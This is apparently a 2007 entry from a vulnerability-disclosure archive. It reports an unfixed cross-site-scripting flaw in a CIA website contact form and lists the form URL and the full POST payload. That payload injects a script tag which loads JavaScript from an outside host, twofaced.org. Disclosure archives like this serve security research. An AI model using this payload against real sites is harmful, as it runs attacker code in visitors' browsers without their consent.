Security researcher Kr3w, has submitted on 16/05/2007 a cross-site-scripting (XSS) vulnerability affecting www.cia.gov, which at the time of submission ranked 99930 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/05/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 16/05/2007 |
Date published: 16/05/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Kr3w |
Domain: www.cia.gov |
Category: XSS |
Pagerank: 99930 |
URL: https://www.cia.gov/cgi-bin/forlang_form.cgi |
POST: email='"/></><script src=http://twofaced.org/lel.js>&sender=&phone_num=&phone_ext=&fax_num=&purpose=No+answer&message=&su bmit=Send |
Click here to view the mirror
|
|
|